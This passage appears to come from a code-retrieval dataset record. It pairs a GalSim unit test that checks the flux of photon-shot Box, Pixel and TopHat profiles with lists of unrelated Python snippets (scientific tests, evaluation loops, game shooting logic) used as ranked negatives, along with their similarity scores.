self.opt.save_input or self.opt.phase == 'val':\n self.save_results(self.input_P1, data_name='ref')\n self.save_results(self.input_P2, data_name='gt')\n result = torch.cat([self.input_P1, img_gen, self.input_P2], 3)\n self.save_results(result, data_name='all')", "def checkProfileEquality(self, profile1, profile2):\n if len(profile1) != len(profile2) or len(profile1[0]) != len(profile2[0]):\n return False\n for gram1 in profile1:\n contains = False\n for gram2 in profile2:\n if gram1 == gram2:\n contains = True\n break\n if contains == False:\n return False\n return True", "def test_score():\n\n tpot_obj = TPOTClassifier()\n\n try:\n tpot_obj.score(testing_features, testing_classes)\n assert False # Should be unreachable\n except ValueError:\n pass", "def test_parcel_profile_saturated():\n levels = np.array([1000., 700., 500.]) * units.mbar\n true_prof = np.array([296.95, 284.381, 271.123]) * units.kelvin\n\n prof = parcel_profile(levels, 23.8 * units.degC, 23.8 * units.degC)\n assert_array_almost_equal(prof, true_prof, 2)", "def test(model,gen,n_id,threshold=0.5,verbose=True,print_every_n=10):\n t_start = time()\n ce_avg,tp,tn,fp,fn = 0.,0.,0.,0.,0.\n for i in range(n_id):\n X_test,y_test = gen.next()\n y_test = y_test.mean()\n Y_pred = model.predict(X_test)\n y_pred = Y_pred.max(axis=0)\n ce = np.mean(- y_test * np.log(y_pred) - (1-y_test) * np.log(1-y_pred))\n ce_avg += ce/n_id\n y_predr = y_pred.round()\n tp += sum((y_test == 1) & (y_predr == 1))\n tn += sum((y_test == 0) & (y_predr == 0))\n fp += sum((y_test == 0) & (y_predr == 1))\n fn += sum((y_test == 1) & (y_predr == 0))\n if i % print_every_n == 0:\n print(i)\n prec,recall,acc = tp/(tp+fp+1e-15),tp/(tp+fn+1e-15),(tp+tn)/n_id\n F1 = 2*tp/(2*tp+fp+fn)\n if verbose:\n print('Valid F1 %.3f tp %.3f tn %.3f fp %.3f fn %.3f' % (F1,tp,tn,fp,fn))\n print('Took %.1fs' % (time()-t_start))\n return(ce_avg,prec,recall,F1,acc,tp,tn,fp,fn)", "def test_generate_paulis(generators, num_qubits, result):\n pauli_ops = qml.paulix_ops(generators, num_qubits)\n for p1, p2 in zip(pauli_ops, result):\n assert p1.compare(p2)", "def profile_step(self):\n import profile\n\n profile.run(\"world.step()\")", "def test_T4():", "def test_T4():", "def test_profiler(self):\n\n a = np.arange(16, dtype=np.float32)\n b = np.arange(16, dtype=np.float32)\n p = profiler.Profile()\n try:\n p.enable()\n dot(a, b)\n p.disable()\n stats = pstats.Stats(p).strip_dirs()\n self.assertIn(('test_profiler.py', 7, 'dot'), stats.stats)\n finally:\n # make sure the profiler is deactivated when this test is done so as not to\n # pollute any other tests\n p.disable()\n del p", "def test_T2():", "def test_T2():", "def run_evaluation(self, example):\n assert isinstance(example, dict)\n assert 'name' in example\n\n name = example['name']\n house_id, camera_id = pbrs_utils.parse_house_and_camera_ids_from_string(name)\n\n gt_bg, gt_objects = sorted(glob.glob(path.join(config.default_out_root, 'v9_gt_mesh/{}/{}/gt*.ply'.format(house_id, camera_id))))\n gt_depths = sorted(glob.glob(path.join(config.default_out_root, 'v9_gt_mesh/{}/{}/d*.ply'.format(house_id, camera_id))))\n print(gt_depths)\n assert len(gt_depths) == 5\n\n gt_overhead_fg = sorted(glob.glob(path.join(config.default_out_root, 'v9_gt_overhead_mesh/{}/{}/overhead_fg.ply'.format(house_id, camera_id))))\n assert len(gt_overhead_fg) == 1\n gt_overhead_fg = gt_overhead_fg[0]\n assert path.exists(gt_overhead_fg)\n\n pred_depths = sorted(glob.glob(path.join(config.default_out_root, 'v9_pred_depth_mesh/{}/{}/pred_*.ply'.format(house_id, camera_id))))\n assert len(pred_depths) == 5\n\n pred_overhead_fg = sorted(glob.glob(path.join(config.default_out_root, 'v9_pred_depth_mesh/{}/{}/overhead_fg_clipped.ply'.format(house_id, camera_id))))\n assert len(pred_overhead_fg) == 1\n pred_overhead_fg = pred_overhead_fg[0]\n\n # pred_files_list = sorted(glob.glob(path.join(config.default_out_root, 'v9_pred_depth_mesh/{}/{}/*.ply'.format(house_id, camera_id))))\n # pred_files = {path.basename(item).split('.')[0]: item for item in pred_files_list}\n # f3d_pred = path.join(config.default_out_root, 'factored3d_pred/{}/{}/codes_transformed_clipped.ply'.format(house_id, camera_id))\n\n # assert path.isfile(f3d_pred), f3d_pred\n\n # if 'overhead_fg_clipped' not in pred_files:\n # print('Overhead file is not available. Skipping for now. {}'.format(name))\n # return\n\n # self.run_if_not_exists(name, self.key('pred', 'obj', ['overhead_fg']), [gt_objects], [pred_files['overhead_fg_clipped']])\n # self.run_if_not_exists(name, self.key('pred', 'obj', ['0']), [gt_objects], [pred_files['pred_0']])\n # self.run_if_not_exists(name, self.key('pred', 'obj', ['1']), [gt_objects], [pred_files['pred_1']])\n # self.run_if_not_exists(name, self.key('pred', 'obj', ['2']), [gt_objects], [pred_files['pred_2']])\n # self.run_if_not_exists(name, self.key('pred', 'obj', ['0', 'overhead_fg']), [gt_objects], [pred_files['pred_0'], pred_files['overhead_fg_clipped']])\n # self.run_if_not_exists(name, self.key('pred', 'obj', ['1', 'overhead_fg']), [gt_objects], [pred_files['pred_1'], pred_files['overhead_fg_clipped']])\n # self.run_if_not_exists(name, self.key('pred', 'obj', ['2', 'overhead_fg']), [gt_objects], [pred_files['pred_2'], pred_files['overhead_fg_clipped']])\n # self.run_if_not_exists(name, self.key('pred', 'obj', ['0', '1']), [gt_objects], [pred_files['pred_0'], pred_files['pred_1']])\n # self.run_if_not_exists(name, self.key('pred', 'obj', ['0', '2']), [gt_objects], [pred_files['pred_0'], pred_files['pred_2']])\n # self.run_if_not_exists(name, self.key('pred', 'obj', ['1', '2']), [gt_objects], [pred_files['pred_1'], pred_files['pred_2']])\n # self.run_if_not_exists(name, self.key('pred', 'obj', ['0', '1', '2']), [gt_objects], [pred_files['pred_0'], pred_files['pred_1'], pred_files['pred_2']])\n # self.run_if_not_exists(name, self.key('pred', 'obj', ['0', '1', '2', 'overhead_fg']), [gt_objects], [pred_files['pred_0'], pred_files['pred_1'], pred_files['pred_2'], pred_files['overhead_fg_clipped']])\n # self.run_if_not_exists(name, self.key('pred', 'obj', ['0', '1', '2', 'overhead_fg', 'f3d']), [gt_objects], [pred_files['pred_0'], pred_files['pred_1'], pred_files['pred_2'], pred_files['overhead_fg_clipped'], f3d_pred])\n # self.run_if_not_exists(name, self.key('pred', 'obj', ['f3d']), [gt_objects], [f3d_pred])\n\n # self.run_if_not_exists(name, self.key('gt_depth', 'obj', ['1', '2', '3']), [gt_objects], [gt_depths[1], gt_depths[2], gt_depths[3]])\n # self.run_if_not_exists(name, self.key('gt_depth', 'obj', ['2', '3']), [gt_objects], [gt_depths[2], gt_depths[3]])\n # self.run_if_not_exists(name, self.key('gt_depth', 'obj', ['3']), [gt_objects], [gt_depths[3]])\n\n self.run_if_not_exists(name, self.key('gt_depth', 'obj', ['0']), [gt_objects], [gt_depths[0]])\n self.run_if_not_exists(name, self.key('gt_depth', 'obj', ['1']), [gt_objects], [gt_depths[1]])\n self.run_if_not_exists(name, self.key('gt_depth', 'obj', ['2']), [gt_objects], [gt_depths[2]])\n self.run_if_not_exists(name, self.key('gt_depth', 'obj', ['3']), [gt_objects], [gt_depths[3]])\n self.run_if_not_exists(name, self.key('gt_depth', 'obj', ['overhead_fg']), [gt_objects], [gt_overhead_fg])\n self.run_if_not_exists(name, self.key('gt_depth', 'obj', ['0', '1']), [gt_objects], [gt_depths[0], gt_depths[1]])\n self.run_if_not_exists(name, self.key('gt_depth', 'obj', ['0', '1', '2']), [gt_objects], [gt_depths[0], gt_depths[1], gt_depths[2]])\n self.run_if_not_exists(name, self.key('gt_depth', 'obj', ['0', '1', '2', '3']), [gt_objects], [gt_depths[0], gt_depths[1], gt_depths[2], gt_depths[3]])\n self.run_if_not_exists(name, self.key('gt_depth', 'obj', ['0', '1', '2', '3', 'overhead_fg']), [gt_objects], [gt_depths[0], gt_depths[1], gt_depths[2], gt_depths[3], gt_overhead_fg])\n\n self.run_if_not_exists(name, self.key('gt_depth', 'both', ['0']), [gt_bg, gt_objects], [gt_depths[0]])\n self.run_if_not_exists(name, self.key('gt_depth', 'both', ['1']), [gt_bg, gt_objects], [gt_depths[1]])\n self.run_if_not_exists(name, self.key('gt_depth', 'both', ['2']), [gt_bg, gt_objects], [gt_depths[2]])\n self.run_if_not_exists(name, self.key('gt_depth', 'both', ['3']), [gt_bg, gt_objects], [gt_depths[3]])\n self.run_if_not_exists(name, self.key('gt_depth', 'both', ['4']), [gt_bg, gt_objects], [gt_depths[4]])\n self.run_if_not_exists(name, self.key('gt_depth', 'both', ['overhead_fg']), [gt_bg, gt_objects], [gt_overhead_fg])\n self.run_if_not_exists(name, self.key('gt_depth', 'both', ['4', '0']), [gt_bg, gt_objects], [gt_depths[4], gt_depths[0]])\n self.run_if_not_exists(name, self.key('gt_depth', 'both', ['4', '0', '1']), [gt_bg, gt_objects], [gt_depths[4], gt_depths[0], gt_depths[1]])\n self.run_if_not_exists(name, self.key('gt_depth', 'both', ['4', '0', '1', '2']), [gt_bg, gt_objects], [gt_depths[4], gt_depths[0], gt_depths[1], gt_depths[2]])\n self.run_if_not_exists(name, self.key('gt_depth', 'both', ['0', '1']), [gt_bg, gt_objects], [gt_depths[0], gt_depths[1]])\n self.run_if_not_exists(name, self.key('gt_depth', 'both', ['0', '1', '2']), [gt_bg, gt_objects], [gt_depths[0], gt_depths[1], gt_depths[2]])\n self.run_if_not_exists(name, self.key('gt_depth', 'both', ['0', '1', '2', '3']), [gt_bg, gt_objects], [gt_depths[0], gt_depths[1], gt_depths[2], gt_depths[3]])\n self.run_if_not_exists(name, self.key('gt_depth', 'both', ['0', '1', '2', '3', '4']), [gt_bg, gt_objects], [gt_depths[0], gt_depths[1], gt_depths[2], gt_depths[3], gt_depths[4]])\n self.run_if_not_exists(name, self.key('gt_depth', 'both', ['0', '1', '2', '3', '4', 'overhead_fg']), [gt_bg, gt_objects], [gt_depths[0], gt_depths[1], gt_depths[2], gt_depths[3], gt_depths[4], gt_overhead_fg])\n\n # LDI\n self.run_if_not_exists(name, self.key('gt_depth', 'both', ['0', '2', '4']), [gt_bg, gt_objects], [gt_depths[0], gt_depths[2], gt_depths[4]])\n self.run_if_not_exists(name, self.key('gt_depth', 'both', ['0', '2']), [gt_bg, gt_objects], [gt_depths[0], gt_depths[2]])\n\n self.run_if_not_exists(name, self.key('pred', 'obj', ['0']), [gt_objects], [pred_depths[0]])\n self.run_if_not_exists(name, self.key('pred', 'obj', ['1']), [gt_objects], [pred_depths[1]])\n self.run_if_not_exists(name, self.key('pred', 'obj', ['2']), [gt_objects], [pred_depths[2]])\n self.run_if_not_exists(name, self.key('pred', 'obj', ['3']), [gt_objects], [pred_depths[3]])\n self.run_if_not_exists(name, self.key('pred', 'obj', ['overhead_fg']), [gt_objects], [pred_overhead_fg], force=True)\n self.run_if_not_exists(name, self.key('pred', 'obj', ['0', 'overhead_fg']), [gt_objects], [pred_depths[0], pred_overhead_fg])\n self.run_if_not_exists(name, self.key('pred', 'obj', ['0', '1']), [gt_objects], [pred_depths[0], pred_depths[1]])\n self.run_if_not_exists(name, self.key('pred', 'obj', ['0', '1', '2']), [gt_objects], [pred_depths[0], pred_depths[1], pred_depths[2]])\n self.run_if_not_exists(name, self.key('pred', 'obj', ['0', '1', '2', '3']), [gt_objects], [pred_depths[0], pred_depths[1], pred_depths[2], pred_depths[3]])\n self.run_if_not_exists(name, self.key('pred', 'obj', ['0', '1', '2', '3', 'overhead_fg']), [gt_objects], [pred_depths[0], pred_depths[1], pred_depths[2], pred_depths[3], pred_overhead_fg], force=True)\n\n self.run_if_not_exists(name, self.key('pred', 'both', ['0']), [gt_bg, gt_objects], [pred_depths[0]])\n self.run_if_not_exists(name, self.key('pred', 'both', ['1']), [gt_bg, gt_objects], [pred_depths[1]])\n self.run_if_not_exists(name, self.key('pred', 'both', ['2']), [gt_bg, gt_objects], [pred_depths[2]])\n self.run_if_not_exists(name, self.key('pred', 'both', ['3']), [gt_bg, gt_objects], [pred_depths[3]])\n self.run_if_not_exists(name, self.key('pred', 'both', ['4']), [gt_bg, gt_objects], [pred_depths[4]])\n self.run_if_not_exists(name, self.key('pred', 'both', ['overhead_fg']), [gt_bg, gt_objects], [pred_overhead_fg], force=True)\n self.run_if_not_exists(name, self.key('pred', 'both', ['4', '0']), [gt_bg, gt_objects], [pred_depths[4], pred_depths[0]])\n self.run_if_not_exists(name, self.key('pred', 'both', ['4', '0', '1']), [gt_bg, gt_objects], [pred_depths[4], pred_depths[0], pred_depths[1]])\n self.run_if_not_exists(name, self.key('pred', 'both', ['4', '0', '1', '2']), [gt_bg, gt_objects], [pred_depths[4], pred_depths[0], pred_depths[1], pred_depths[2]])\n self.run_if_not_exists(name, self.key('pred', 'both', ['4', '0', '1', '2', '3']), [gt_bg, gt_objects], [pred_depths[4], pred_depths[0], pred_depths[1], pred_depths[2], pred_depths[3]])\n self.run_if_not_exists(name, self.key('pred', 'both', ['4', '0', '1', '2', '3', 'overhead_fg']), [gt_bg, gt_objects], [pred_depths[4], pred_depths[0], pred_depths[1], pred_depths[2], pred_depths[3], pred_overhead_fg], force=True)\n\n # self.run_if_not_exists(name, self.key('pred', 'both', ['overhead_fg']), [gt_bg, gt_objects], [pred_files['overhead_fg_clipped']])\n # self.run_if_not_exists(name, self.key('pred', 'both', ['0']), [gt_bg, gt_objects], [pred_files['pred_0']])\n # self.run_if_not_exists(name, self.key('pred', 'both', ['1']), [gt_bg, gt_objects], [pred_files['pred_1']])\n # self.run_if_not_exists(name, self.key('pred', 'both', ['2']), [gt_bg, gt_objects], [pred_files['pred_2']])\n # self.run_if_not_exists(name, self.key('pred', 'both', ['3']), [gt_bg, gt_objects], [pred_files['pred_3']])\n # self.run_if_not_exists(name, self.key('pred', 'both', ['0', '3']), [gt_bg, gt_objects], [pred_files['pred_0'], pred_files['pred_3']])\n # self.run_if_not_exists(name, self.key('pred', 'both', ['0', '1', '3']), [gt_bg, gt_objects], [pred_files['pred_0'], pred_files['pred_1'], pred_files['pred_3']])\n # self.run_if_not_exists(name, self.key('pred', 'both', ['0', '1', '2', '3']), [gt_bg, gt_objects], [pred_files['pred_0'], pred_files['pred_1'], pred_files['pred_2'], pred_files['pred_3']])\n # self.run_if_not_exists(name, self.key('pred', 'both', ['0', '1', '2', '3', 'overhead_fg']), [gt_bg, gt_objects], [pred_files['pred_0'], pred_files['pred_1'], pred_files['pred_2'], pred_files['pred_3'], pred_files['overhead_fg_clipped']])\n #\n # # self.run_if_not_exists(name, self.key('gt_depth', 'both', ['overhead_fg']), [gt_bg, gt_objects], [pred_files['overhead_fg_clipped']])\n # self.run_if_not_exists(name, self.key('gt_depth', 'both', ['0']), [gt_bg, gt_objects], [gt_depths[0]])\n # self.run_if_not_exists(name, self.key('gt_depth', 'both', ['1']), [gt_bg, gt_objects], [gt_depths[1]])\n # self.run_if_not_exists(name, self.key('gt_depth', 'both', ['2']), [gt_bg, gt_objects], [gt_depths[2]])\n # self.run_if_not_exists(name, self.key('gt_depth', 'both', ['3']), [gt_bg, gt_objects], [gt_depths[3]])\n # self.run_if_not_exists(name, self.key('gt_depth', 'both', ['0', '3']), [gt_bg, gt_objects], [gt_depths[0], gt_depths[3], ])\n # self.run_if_not_exists(name, self.key('gt_depth', 'both', ['0', '1', '3']), [gt_bg, gt_objects], [gt_depths[0], gt_depths[1], gt_depths[3], ])\n # self.run_if_not_exists(name, self.key('gt_depth', 'both', ['0', '1', '2', '3']), [gt_bg, gt_objects], [gt_depths[0], gt_depths[1], gt_depths[2], gt_depths[3], ])\n # # self.run_if_not_exists(name, self.key('gt_depth', 'both', ['0', '1', '2', '3', 'overhead_fg']), [gt_bg, gt_objects], [])\n #\n # # self.run_if_not_exists(name, self.key('gt_depth', 'obj', ['2', '3']), [gt_objects], [gt_depths[2], gt_depths[3]])\n # # self.run_if_not_exists(name, self.key('gt_depth', 'obj', ['1', '2', '3']), [gt_objects], [gt_depths[1], gt_depths[2], gt_depths[3]])\n # # self.run_if_not_exists(name, self.key('gt_depth', 'obj', ['0', '1', '2', '3']), [gt_objects], [gt_depths[0], gt_depths[1], gt_depths[2], gt_depths[3]])\n #\n # self.run_if_not_exists(name, self.key('gt_depth', 'both', ['0', '1']), [gt_bg, gt_objects], [gt_depths[0], gt_depths[1], ])\n # self.run_if_not_exists(name, self.key('gt_depth', 'both', ['0', '1', '2']), [gt_bg, gt_objects], [gt_depths[0], gt_depths[1], gt_depths[2], ])" ]
[ "0.60760397", "0.59960103", "0.578803", "0.57689196", "0.56904364", "0.5670949", "0.5598614", "0.5586479", "0.55442274", "0.5540673", "0.5539732", "0.5532514", "0.5515403", "0.55088836", "0.54860824", "0.54771906", "0.54092103", "0.5376669", "0.53727055", "0.53688246", "0.5344023", "0.5321525", "0.53172666", "0.52896136", "0.52855694", "0.52560425", "0.52446467", "0.5241707", "0.5236878", "0.5236562", "0.52350724", "0.52340144", "0.52271205", "0.5221293", "0.52153987", "0.5207533", "0.5199755", "0.51859486", "0.51833725", "0.51478934", "0.5143337", "0.5130446", "0.51292586", "0.51284426", "0.5128408", "0.51243496", "0.5117261", "0.5115636", "0.5114109", "0.5094555", "0.50836825", "0.5076322", "0.5071944", "0.5068377", "0.50615937", "0.5056286", "0.5053309", "0.50503606", "0.5047189", "0.5047189", "0.50441885", "0.5041904", "0.50396496", "0.50381094", "0.50267595", "0.5006108", "0.50023586", "0.49947596", "0.49937245", "0.49928695", "0.4992793", "0.49894845", "0.4988107", "0.49827287", "0.49717438", "0.4967711", "0.49643826", "0.49614263", "0.495809", "0.49561414", "0.4954187", "0.49480277", "0.4947991", "0.49470532", "0.49451295", "0.49338853", "0.49335906", "0.49304873", "0.49280733", "0.49232152", "0.492118", "0.49202713", "0.49163684", "0.49156007", "0.49133268", "0.49124014", "0.49124014", "0.490697", "0.49057528", "0.49057528", "0.4905614" ]
0.0
-1
Test Box with photon shooting. Particularly the flux of the final image.
def test_box_shoot(): rng = galsim.BaseDeviate(1234) obj = galsim.Box(width=1.3, height=2.4, flux=1.e4) im = galsim.Image(100,100, scale=1) im.setCenter(0,0) added_flux, photons = obj.drawPhot(im, poisson_flux=False, rng=rng.duplicate()) print('obj.flux = ',obj.flux) print('added_flux = ',added_flux) print('photon fluxes = ',photons.flux.min(),'..',photons.flux.max()) print('image flux = ',im.array.sum()) assert np.isclose(added_flux, obj.flux) assert np.isclose(im.array.sum(), obj.flux) photons2 = obj.makePhot(poisson_flux=False, rng=rng) assert photons2 == photons, "Box makePhot not equivalent to drawPhot" obj = galsim.Pixel(scale=9.3, flux=1.e4) added_flux, photons = obj.drawPhot(im, poisson_flux=False, rng=rng.duplicate()) print('obj.flux = ',obj.flux) print('added_flux = ',added_flux) print('photon fluxes = ',photons.flux.min(),'..',photons.flux.max()) print('image flux = ',im.array.sum()) assert np.isclose(added_flux, obj.flux) assert np.isclose(im.array.sum(), obj.flux) photons2 = obj.makePhot(poisson_flux=False, rng=rng) assert photons2 == photons, "Pixel makePhot not equivalent to drawPhot" obj = galsim.TopHat(radius=4.7, flux=1.e4) added_flux, photons = obj.drawPhot(im, poisson_flux=False, rng=rng.duplicate()) print('obj.flux = ',obj.flux) print('added_flux = ',added_flux) print('photon fluxes = ',photons.flux.min(),'..',photons.flux.max()) print('image flux = ',im.array.sum()) assert np.isclose(added_flux, obj.flux) assert np.isclose(im.array.sum(), obj.flux) photons2 = obj.makePhot(poisson_flux=False, rng=rng) assert photons2 == photons, "TopHat makePhot not equivalent to drawPhot"
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_box():\n savedImg = galsim.fits.read(os.path.join(imgdir, \"box_1.fits\"))\n myImg = galsim.ImageF(savedImg.bounds, scale=0.2)\n myImg.setCenter(0,0)\n test_flux = 1.8\n\n pixel = galsim.Pixel(scale=1, flux=1)\n pixel.drawImage(myImg, method=\"sb\", use_true_center=False)\n np.testing.assert_array_almost_equal(\n myImg.array, savedImg.array, 5,\n err_msg=\"Using GSObject Pixel disagrees with expected result\")\n np.testing.assert_array_equal(\n pixel.scale, 1,\n err_msg=\"Pixel scale returned wrong value\")\n\n # Check with default_params\n pixel = galsim.Pixel(scale=1, flux=1, gsparams=default_params)\n pixel.drawImage(myImg, method=\"sb\", use_true_center=False)\n np.testing.assert_array_almost_equal(\n myImg.array, savedImg.array, 5,\n err_msg=\"Using GSObject Pixel with default_params disagrees with expected result\")\n pixel = galsim.Pixel(scale=1, flux=1, gsparams=galsim.GSParams())\n pixel.drawImage(myImg, method=\"sb\", use_true_center=False)\n np.testing.assert_array_almost_equal(\n myImg.array, savedImg.array, 5,\n err_msg=\"Using GSObject Pixel with GSParams() disagrees with expected result\")\n\n # Use non-unity values.\n pixel = galsim.Pixel(flux=1.7, scale=2.3)\n gsp = galsim.GSParams(xvalue_accuracy=1.e-8, kvalue_accuracy=1.e-8)\n pixel2 = galsim.Pixel(flux=1.7, scale=2.3, gsparams=gsp)\n assert pixel2 != pixel\n assert pixel2 == pixel.withGSParams(xvalue_accuracy=1.e-8, kvalue_accuracy=1.e-8)\n\n # Test photon shooting.\n do_shoot(pixel,myImg,\"Pixel\")\n\n # Check picklability\n do_pickle(pixel, lambda x: x.drawImage(method='no_pixel'))\n do_pickle(pixel)\n do_pickle(galsim.Pixel(1))\n\n # Check that non-square Box profiles work correctly\n scale = 0.2939 # Use a strange scale here to make sure that the centers of the pixels\n # never fall on the box edge, otherwise it gets a bit weird to know what\n # the correct SB value is for that pixel.\n im = galsim.ImageF(16,16, scale=scale)\n gsp = galsim.GSParams(maximum_fft_size = 30000)\n for (width,height) in [ (3,2), (1.7, 2.7), (2.2222, 3.1415) ]:\n box = galsim.Box(width=width, height=height, flux=test_flux, gsparams=gsp)\n check_basic(box, \"Box with width,height = %f,%f\"%(width,height))\n do_shoot(box,im,\"Box with width,height = %f,%f\"%(width,height))\n if __name__ == '__main__':\n # These are slow because they require a pretty huge fft.\n # So only do them if running as main.\n do_kvalue(box,im,\"Box with width,height = %f,%f\"%(width,height))\n cen = galsim.PositionD(0, 0)\n np.testing.assert_equal(box.centroid, cen)\n np.testing.assert_almost_equal(box.kValue(cen), (1+0j) * test_flux)\n np.testing.assert_almost_equal(box.flux, test_flux)\n np.testing.assert_almost_equal(box.xValue(cen), box.max_sb)\n np.testing.assert_almost_equal(box.xValue(width/2.-0.001, height/2.-0.001), box.max_sb)\n np.testing.assert_almost_equal(box.xValue(width/2.-0.001, height/2.+0.001), 0.)\n np.testing.assert_almost_equal(box.xValue(width/2.+0.001, height/2.-0.001), 0.)\n np.testing.assert_almost_equal(box.xValue(width/2.+0.001, height/2.+0.001), 0.)\n np.testing.assert_array_equal(\n box.width, width,\n err_msg=\"Box width returned wrong value\")\n np.testing.assert_array_equal(\n box.height, height,\n err_msg=\"Box height returned wrong value\")\n\n gsp2 = galsim.GSParams(xvalue_accuracy=1.e-8, kvalue_accuracy=1.e-8)\n box2 = galsim.Box(width=width, height=height, flux=test_flux, gsparams=gsp2)\n assert box2 != box\n assert box2 == box.withGSParams(gsp2)\n assert box2 != box.withGSParams(xvalue_accuracy=1.e-8, kvalue_accuracy=1.e-8)\n assert box2.withGSParams(maximum_fft_size=30000) == box.withGSParams(xvalue_accuracy=1.e-8, kvalue_accuracy=1.e-8)\n\n # Check picklability\n do_pickle(box, lambda x: x.drawImage(method='no_pixel'))\n do_pickle(box)\n do_pickle(galsim.Box(1,1))\n\n # Check sheared boxes the same way\n box = galsim.Box(width=3, height=2, flux=test_flux, gsparams=gsp)\n box = box.shear(galsim.Shear(g1=0.2, g2=-0.3))\n check_basic(box, \"Sheared Box\", approx_maxsb=True)\n do_shoot(box,im, \"Sheared Box\")\n if __name__ == '__main__':\n do_kvalue(box,im, \"Sheared Box\")\n do_pickle(box, lambda x: x.drawImage(method='no_pixel'))\n do_pickle(box)\n cen = galsim.PositionD(0, 0)\n np.testing.assert_equal(box.centroid, cen)\n np.testing.assert_almost_equal(box.kValue(cen), (1+0j) * test_flux)\n np.testing.assert_almost_equal(box.flux, test_flux)\n np.testing.assert_almost_equal(box.xValue(cen), box.max_sb)\n\n # This is also a profile that may be convolved using real space convolution, so test that.\n if __name__ == '__main__':\n conv = galsim.Convolve(box, galsim.Pixel(scale=scale), real_space=True)\n check_basic(conv, \"Sheared Box convolved with pixel in real space\",\n approx_maxsb=True, scale=0.2)\n do_kvalue(conv,im, \"Sheared Box convolved with pixel in real space\")\n do_pickle(conv, lambda x: x.xValue(0.123,-0.456))\n do_pickle(conv)", "def shoot(self):\n self.assertIsInstance(gun(3).shoot(), 2)\n self.assertIsInstance(gun(10).shoot(), 9)", "def shoot(self):\n if self.gun_interface:\n self.gun_interface.prepare_fire()", "def shoot(self):\n e = self.energy()\n y = self.rap()\n sqrt_pt2_m2 = e / math.cosh(y)\n pz = sqrt_pt2_m2 * math.sinh(y)\n m = self.mass()\n pt = math.sqrt( sqrt_pt2_m2**2 - m**2 )\n phi = self.phi()\n px = pt * math.cos(phi);\n py = pt * math.sin(phi);\n v4 = ROOT.TLorentzVector(px, py, pz, e)\n return v4", "def execute(self, cast):\n bricks = cast[\"brick\"] # there's only one\n paddle = cast[\"paddle\"][0] # there's only one\n ball = cast[\"ball\"] [0]\n score = cast[\"score\"] [0]\n lives = cast[\"lives\"] [0]\n \n ball_v = ball.get_velocity()\n paddle_xy = paddle.get_position()\n ball_xy = ball.get_position()\n ball_vx = Point.get_x(ball_v) \n ball_vy = Point.get_y(ball_v)\n \n if Point.get_y(ball_xy) == 1:\n position = Point(ball_vx, 1)\n ball.set_velocity(position)\n \n if Point.get_x(ball_xy) <= 2:\n position = Point(1, ball_vy)\n ball.set_velocity(position)\n\n if Point.get_x(ball_xy) >= 78:\n position = Point(-1, ball_vy)\n ball.set_velocity(position)\n\n paddle_x = Point.get_x(paddle_xy)\n paddle_y = Point.get_y(paddle_xy)\n ball_x = Point.get_x(ball_xy)\n ball_y = Point.get_y(ball_xy)\n\n if ball_y == 18 and lives._lives == 0:\n print(\"\"\"\n ██╗░░░██╗░█████╗░██╗░░░██╗  ██╗░░░░░░█████╗░░██████╗███████╗  ██╗░░██╗\n ╚██╗░██╔╝██╔══██╗██║░░░██║  ██║░░░░░██╔══██╗██╔════╝██╔════╝  ╚═╝░██╔╝\n ░╚████╔╝░██║░░██║██║░░░██║  ██║░░░░░██║░░██║╚█████╗░█████╗░░  ░░░██╔╝░\n ░░╚██╔╝░░██║░░██║██║░░░██║  ██║░░░░░██║░░██║░╚═══██╗██╔══╝░░  ░░░╚██╗░\n ░░░██║░░░╚█████╔╝╚██████╔╝  ███████╗╚█████╔╝██████╔╝███████╗  ██╗░╚██╗\n ░░░╚═╝░░░░╚════╝░░╚═════╝░  ╚══════╝░╚════╝░╚═════╝░╚══════╝  ╚═╝░░╚═╝\"\"\")\n sys.exit()\n elif ball_y == 19 and lives._lives > 0:\n position = Point(ball_vx, -1)\n ball.set_velocity(position)\n lives._lives -= 1\n lives.set_text(f\"Lives: {lives._lives}\")\n\n for _ in range(1, 11):\n\n if paddle_x == ball_x and paddle_y -1 == ball_y or ball_vx == 3:\n if ball_vx == 1 or ball_vx == 2:\n ball_vx = random.randint(1,2)\n elif ball_vx == -1 or ball_vx == -2 or ball_vx == -3:\n ball_vx = random.randint(-2,-1)\n position = Point(ball_vx, -1)\n ball.set_velocity(position)\n paddle_x += 1\n \n i = 0\n\n for brick in bricks:\n position = brick.get_position()\n brick_x = Point.get_x(position)\n brick_y = Point.get_y(position)\n\n if brick_x == ball_x and brick_y == ball_y:\n bricks.pop(i)\n score._points +=1\n score.set_text(f\"Score: {score._points}\")\n if ball_vy == 1:\n ball_vy = -1\n elif ball_vy == -1:\n ball_vy = 1\n\n if ball_vx == 1:\n ball_velocity = Point(-1, ball_vy)\n else:\n ball_velocity = Point(1, ball_vy)\n ball.set_velocity(ball_velocity)\n\n i += 1", "def shoot(self):\n eta = self.eta()\n theta = 2 * math.atan(math.exp(-eta));\n e = self.energy()\n m = self.mass()\n p = math.sqrt( e**2 - m**2 )\n pz = p * math.cos(theta)\n pt = p * math.sin(theta)\n phi = self.phi()\n px = pt * math.cos(phi)\n py = pt * math.sin(phi)\n v4 = ROOT.TLorentzVector(px, py, pz, e)\n return v4", "def maybe_shoot(self):\n res = self.space.segment_query_first((self.tank.body.position[0] - \\\n 0.6 * math.sin(self.tank.body.angle), self.tank.body.position[1] +\\\n 0.6 * math.cos(self.tank.body.angle)), (self.tank.body.position[0] -\\\n 10*math.sin(self.tank.body.angle), self.tank.body.position[1] + \\\n 10*math.cos(self.tank.body.angle)), 0, pymunk.ShapeFilter())\n if res is not None:\n try:\n if hasattr(res, 'shape'):\n if isinstance(res.shape.parent, gameobjects.Tank):\n bullet = self.tank.shoot(self.space)\n if bullet is not None:\n self.game_objects_list.append(bullet)\n elif isinstance(res.shape.parent, gameobjects.Box):\n if res.shape.parent.boxmodel.destructable is True:\n bullet = self.tank.shoot(self.space)\n if bullet is not None:\n self.game_objects_list.append(bullet)\n except:\n pass", "def shoot(self):\n pt = self.pt()\n assert pt >= 0\n m = self.mass()\n assert m >= 0\n sqrt_pt2_m2 = math.sqrt( pt**2 + m**2 )\n y = self.rap()\n e = sqrt_pt2_m2 * math.cosh(y)\n pz = sqrt_pt2_m2 * math.sinh(y)\n phi = self.phi()\n px = pt * math.cos(phi);\n py = pt * math.sin(phi);\n v4 = ROOT.TLorentzVector(px, py, pz, e)\n return v4", "def shoot(self):\n eta = self.eta()\n theta = 2 * math.atan(math.exp(-eta));\n pt = self.pt()\n p = pt / math.sin(theta)\n phi = self.phi()\n px = pt * math.cos(phi)\n py = pt * math.sin(phi)\n pz = p * 